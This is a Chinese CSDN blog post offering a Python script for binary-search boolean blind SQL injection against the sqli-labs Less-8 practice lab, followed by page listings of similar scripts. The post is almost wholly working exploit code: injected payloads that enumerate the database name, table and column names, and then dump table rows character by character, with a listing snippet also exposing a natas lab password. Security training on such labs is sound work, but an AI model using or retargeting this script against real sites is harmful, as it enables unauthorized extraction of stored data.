sql-lap less8 二分法sql盲注脚本

最新推荐文章于 2023-09-07 09:12:29 发布
最新推荐文章于 2023-09-07 09:12:29 发布
阅读量239 收藏
点赞数
文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73722777/article/details/130159887
版权 
import requests as req
url="http://127.0.0.1/sqli/Less-8/"
url_o=url
res=''
database_name=''
k=0
'''for i in range(8,100):
    id=f"?id=1' and length(database())={i}--+"
    url+=id
    r=req.get(url=url)
    if "You" in r.text:
        print("数据库长为:",i)
        break
    url=url_o
url=url_o
for j in range(1,i+1):
    max_num = 128
    min_num = 48
    while (min_num<=max_num):
        mid=(max_num+min_num)//2
        print(mid)
        id = f"?id=1' and ascii(substr(database(),{j},1))>{mid}--+"
        url+=id
        r = req.get(url=url)
       #print(url)
        url=url_o
        if "You" in r.text:
            min_num=mid+1
        else:
            max_num=mid
        if mid==(min_num+max_num)//2:
            break
    database_name+=chr(mid)
    print(database_name)
    url=url_o
print("数据库名为:"+database_name)
url=url_o'''
tablen=[0 for i in range(10)]
for k in range(0,10):
    id = f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {k},1))--+"
    url += id
    r = req.get(url=url)
    url = url_o
    if "You" in r.text:
        for i in range(1,100):
            id = f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {k},1))={i}--+"
            url += id
            print('当前语句:'+url)
            r = req.get(url=url)
            url = url_o
            if "You" in r.text:
                tablen[k]=i
                break
    else:
        break
for i in range(0,k):
    print('表',i+1,'长度为',tablen[i],'\n')
tabname=['' for i in range(10)]
for i in range(0,k):
    for j in range(1,tablen[i]+1):
        max_num = 128
        min_num = 32
        while (min_num <= max_num):
            mid = (max_num + min_num) // 2
            id = f"?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {i},1),{j},1))>{mid}--+"
            url += id
            print('当前语句:'+url)
            r = req.get(url=url)
            url = url_o
            if "You" in r.text:
                min_num = mid + 1
            else:
                max_num = mid
            if mid == (min_num + max_num) // 2:
                break
        tabname[i]+=chr(mid)
for i in range(0,k):
    print('表',i,'名字为:'+tabname[i])
print('请输入要查询的表序号:')
tabnum=eval(input())
columnlen=[0 for i in range(10)]
for k in range(0,10):
    id = f"?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='{tabname[tabnum]}' limit {k},1))--+"
    url += id
    r = req.get(url=url)
    print(url)
    url = url_o
    if "You" in r.text:
        for i in range(1,100):
            id = f"?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='{tabname[tabnum]}' limit {k},1))={i}--+"
            url += id
            print('当前语句:' + url)
            r = req.get(url=url)
            url = url_o
            if "You" in r.text:
                columnlen[k]=i
                break
    else:
        break
for i in range(0,k):
    print('字段',i,'长度为',columnlen[i])
columnname=['' for i in range(10)]
for i in range(0,k):
    for j in range(1,columnlen[i]+1):
        max_num = 128
        min_num = 32
        while (min_num <= max_num):
            mid = (max_num + min_num) // 2
            print(mid)
            id = f"?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='{tabname[tabnum]}' limit {i},1),{j},1))>{mid}--+"
            url += id
            print('当前语句:' + url)
            r = req.get(url=url)
            url = url_o
            if "You" in r.text:
                min_num = mid + 1
            else:
                max_num = mid
            if mid == (min_num + max_num) // 2:
                break
        columnname[i]+=chr(mid)
for i in range(0,k):
    print("字段",i,'名字为',columnname[i])
metadata=['' for i in range(10)]
for i in range(0,k):
    print(columnname[i]+' ',end='')
print('\n')
for j in range(0,10):
    metadata = ['' for i in range(10)]
    id = f"?id=1' and ascii(substr((select {columnname[0]} from {tabname[tabnum]} limit {j},1),1,1))>1--+"
    url += id
    r = req.get(url=url)
    url = url_o
    if "You" in r.text:
        for i in range(0, k):
            for n in range(1,20):
                id = f"?id=1' and ascii(substr((select {columnname[i]} from {tabname[tabnum]} limit {j},1),{n},1))>1--+"
                url += id
                r = req.get(url=url)
                url = url_o
                if "You" in r.text:
                    max_num = 128
                    min_num = 32
                    while (min_num <= max_num):
                        mid = (max_num + min_num) // 2
                        id = f"?id=1' and ascii(substr((select {columnname[i]} from {tabname[tabnum]} limit {j},1),{n},1))>{mid}--+"
                        url += id
                        r = req.get(url=url)
                        url = url_o
                        if "You" in r.text:
                            min_num = mid + 1
                        else:
                            max_num = mid
                        if mid == (min_num + max_num) // 2:
                            break
                else:
                    break
                metadata[i]+=chr(mid)
            print(metadata[i]+'   ',end='')
    else:
        break
    print('\n')

(能用,但不知道改一下会不会出bug)

lemofox
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs_less8布尔盲注脚本
qq_62989306的博客
01-28 4728
import requests import string url='http://127.0.0.1/sqli/Less-8/' i=0 db_name_len=0 print('[+]正在猜解数据库长度......') while True: payload=url+"?id=1'and length(database())=%d--+"%i res=requests.get(payload) #print(payload) if 'You are in.......
SQLi LABS Less-8 布尔盲注
热门推荐
wangyuxiang946的博客
02-17 1万+
SQLi 第八关,sqli-labs less8,sqlilabs less 8
【Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
RexHa的博客
11-18 1725
python实现sqli-labs第15关post盲注二分法注入脚本(基于布尔盲注
sqli-labs/Less-8
m0_71299382的博客
11-09 218
sqli-labs第八关
关于上一篇SQL less-8的爬虫脚本
qq_44656678的博客
09-14 182
#!/usr/bin/env Python 3.7.4 import urllib.request url = "http://192.168.1.128/sqli-labs-master/Less-10/?id=1"#自定义攻击的url success_str = "You are in..........." database = "database()" length_payloa...
sql-lap注入靶场
最新发布
05-02
这个"sql-lap注入靶场"是专门为学习和实践SQL注入漏洞而设计的一个平台。在这个靶场中,你可以模拟黑客攻击,体验如何利用SQL注入来破解系统,同时也能够提升你的安全防护意识和技能。 SQL注入攻击的基本原理是,...
dover-lap:Python包,用于组合数字化系统的输出
05-07
DOVER-Lap 正式实现。 安装 pip install dover-lap 怎么跑 安装后,运行 dover-lap [OPTIONS] OUTPUT_RTTM [INPUT_RTTMS]... 例子: dover-lap egs/ami/rttm_dl_test egs/ami/rttm_test_ * 使用说明 Usage: dover...
UCI-FSAE-Lap-Sim:UCI FSAE团队的单圈模拟程序
04-30
UCI-FSAE-Lap-Sim UCI FSAE团队的单圈模拟程序 使用Jupyter iPython笔记本以Python 3编写马特·麦克默里(Matt McMurry) 若要使用,请下载Lap Sim.py以及两个.txt轨道图文件。 打开Lap Sim.py并更改第186行附近的...
AIR-LAP1262N-C-K9胖AP固件
09-23
标题中的"AIR-LAP1262N-C-K9胖AP固件"指的是Cisco的无线接入点(Access Point)型号AIR-LAP1262N-C-K9的固件更新。在无线网络设备中,固件是控制硬件操作并提供功能的软件。胖AP(FAT AP)是一种独立工作的无线接入点...
bai-17-lap-for.html
03-30
标题中的"bai-17-lap-for.html"很可能是指一个关于HTML编程的教程或示例文件,特别是"lap-for"可能暗示着这个话题涉及到HTML中的循环结构,比如使用`<for>`标签。然而,HTML标准中并没有内置的`<for>`标签,这可能是...
二分法实现SQL盲注
小菜猴子_x
09-12 1046
因为在buu上做题,然后无奈研究二分法实现SQL盲注
二分法盲注
qq_43756333的博客
05-25 2768
在学sql盲注脚本的时候碰到了使用二分法盲注字段的情况,学习一下。 环境: [CISCN2019 华北赛区 Day2 Web1]Hack World 复现地址:BUUCTF 打开题目 直接告诉了flag在flag表和flag列里,让我们提交id。 这道题过滤了一些字段以及常用注入语句,可以用Burpsuite来fuzz测试一下,如下所示,长度为482的代表被过滤 最后使用的方法是异或注入,有关异或注入的原理,可参考异或注入 直接给出payload:1^(if((ascii(substr((select
SQL注入(盲注——二分法POST)
qq_43520778的博客
09-07 396
[toc]SQL注入。
python多线程结合二分法算法|命令注入与盲注
tempulcc的博客
09-28 647
实战python多线程结合二分法算法应用命令注入基于时间的盲注 本文采用threading、queue模块启用多线程,结合二分法算法思想(递归、非递归两种方法)实战natas的第16关、第17关,可大幅提升程序寻找通关密码的效率。 命令注入 URL:http://natas16.natas.labs.overthewire.org Username:natas16 Password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh 源码: <? $key = ""; if(arr
mysql盲注二分法脚本
zh_cn1的博客
08-12 427
PS 闲得蛋疼,写了个盲注脚本,最后发现还是sqlmap香 import requests #布尔盲注mysql脚本 #正常页面的大小 def resLen(url): res=requests.get(url) return len(res.text) #当前数据库长度 def currdb_len(url): payload="1' and length(database())=" for i in range(1,100): if resLen(url+payload+str(i
mysql 盲注二分法python脚本
weixin_30384217的博客
04-29 1345
import urllib import urllib2 def doinject(payload): url = 'xxxxxxxxxxxxxxxxxxxxx' values = {'injection':payload,'inject':'Inject'} data = urllib.urlencode(values) #print d...
二分查找在sql盲注里面的应用
0verWatch的博客
08-27 2607
前言 最近在重新复习SQL注入用了sqllabs这个靶场,发现在做盲注的时候自己写的脚本,就一直自增去盲注的话时间花费太大,所以就在看了看二分查找在这一方面的应用 确实快了不少,很久没有写过小脚本就手有点生疏了,赶紧记录一下 正文 二分查找又称折半查找,优点是比较次数少,查找速度快,平均性能好;其缺点是要求待查表为有序表,且插入删除困难。因此,折半查找方法适用于不经常变动而查找频繁的有序列...
二分法更OK的盲注多线程(python脚本
jpygx123的博客
11-21 1451
 废话不多说直接上代码: import threading import requests user_agent = [ "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5", "Mozilla/5...
sql盲注二分法注入脚本
菜鸟-传奇
12-27 1009
sql盲注二分法注入脚本脚本可以用来检测sql靶场第五关 http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1 #-*-coding:utf-8-*- import requests import time #host = "http://web.jarvisoj.com:32787/login.php" host = "http:...
air-lap1042n-c-k9 文档
10-25
air-lap1042n-c-k9是思科公司生产的一款无线接入点设备。它采用了先进的无线技术,支持802.11n标准,提供了高速、稳定的无线网络连接。该设备具有良好的覆盖范围和可靠性,适用于各种场合,如办公室、学校、酒店等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值